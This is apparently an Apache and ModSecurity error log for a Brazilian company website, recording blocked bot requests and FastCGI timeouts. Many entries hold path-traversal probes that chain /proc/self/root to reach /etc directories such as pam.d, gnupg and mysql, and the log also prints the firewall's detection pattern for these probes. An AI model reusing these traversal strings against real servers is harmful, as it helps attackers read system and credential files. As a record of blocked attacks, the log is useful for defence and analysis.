https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:07:36.364116 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:07:40.230834 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.228.61:52060] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnevOw_le52K8_3pV1uywAAAgw"]
[Tue Mar 17 20:07:40.354222 2026] [core:alert] [pid 25836:tid 140411599251200] [client 74.7.243.128:34624] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Tue Mar 17 20:07:41.189461 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.244.43:58302] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnevfPqhzTj3BvfDX-qFwAAAdY"]
[Tue Mar 17 20:07:59.150355 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:08:21.142092 2026] [proxy_fcgi:error] [pid 25836:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:08:42.128354 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38860] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:08:46.541949 2026] [core:alert] [pid 26799:tid 140411708356352] [client 74.7.243.128:58108] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/kbd
[Tue Mar 17 20:09:03.125704 2026] [proxy_fcgi:error] [pid 11088:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:09:26.139791 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:09:49.125801 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40742] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:10:03.357818 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:41774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfS9Y0UrI5A3LftIwhLAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 20:10:11.121879 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:10:34.129878 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:10:59.195376 2026] [proxy_fcgi:error] [pid 2598:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42178] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:11:14.012200 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:56124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfkta6ubjKNq_cu4YphgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:11:15.201384 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.243.128:52774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfk_PqhzTj3BvfDX-quAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:11:15.311930 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:38994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfk9Y0UrI5A3LftIwhVAAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:11:23.133819 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:11:45.515506 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:42520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfsdY0UrI5A3LftIwhewAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:11:46.129849 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42942] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:11:47.929096 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:60376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfs9a6ubjKNq_cu4YpjwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:12:06.153465 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:33990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnfxuyqAr6etmhZHNpJXAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:12:08.137811 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43436] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:12:22.042123 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:44288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnf1ta6ubjKNq_cu4YpqwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:12:24.459508 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.243.128:40792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnf2MU6Sx0TG1YjmQjRmwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:12:31.137816 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:12:41.843213 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.244.43:51056] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnf6dY0UrI5A3LftIwhmQAAAYI"]
[Tue Mar 17 20:12:42.155299 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.228.61:45244] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnf6hj0p0SRWAqcjGGcVwAAAxg"]
[Tue Mar 17 20:12:53.125807 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44848] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:13:15.121837 2026] [proxy_fcgi:error] [pid 25836:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:13:37.125788 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45910] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:14:00.133792 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:14:27.125884 2026] [proxy_fcgi:error] [pid 11088:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:14:55.121112 2026] [proxy_fcgi:error] [pid 7004:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:14:59.753395 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:55704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abngc-yqAr6etmhZHNpJwAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:15:18.140089 2026] [proxy_fcgi:error] [pid 11088:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48384] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:15:42.134896 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:16:03.137783 2026] [proxy_fcgi:error] [pid 6296:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49658] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:16:24.045867 2026] [proxy_fcgi:error] [pid 7004:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50206] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:16:45.130018 2026] [proxy_fcgi:error] [pid 6296:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:17:03.700904 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.243.128:36558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abng74h-PF_25v4hFRCNVAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:17:06.133793 2026] [proxy_fcgi:error] [pid 7004:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51506] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:17:27.045810 2026] [proxy_fcgi:error] [pid 29151:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:17:40.271122 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.243.128:52684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnhFIh-PF_25v4hFRCNfgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:17:45.750194 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.244.43:53852] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnhF3Ik7brgkOH-rIWwmgAAAVg"]
[Tue Mar 17 20:17:49.373827 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52900] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:17:49.497371 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.228.61:36200] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnhHRj0p0SRWAqcjGGdQQAAAxU"]
[Tue Mar 17 20:18:11.133785 2026] [proxy_fcgi:error] [pid 11088:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53700] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:18:32.133877 2026] [proxy_fcgi:error] [pid 25836:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:18:43.322230 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:51622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnhU9Y0UrI5A3LftIwi6AAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:18:53.153823 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:19:14.113822 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55816] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:19:36.059093 2026] [proxy_fcgi:error] [pid 29151:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:19:58.417857 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:20:11.421353 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:44280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnhq9Y0UrI5A3LftIwjTgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
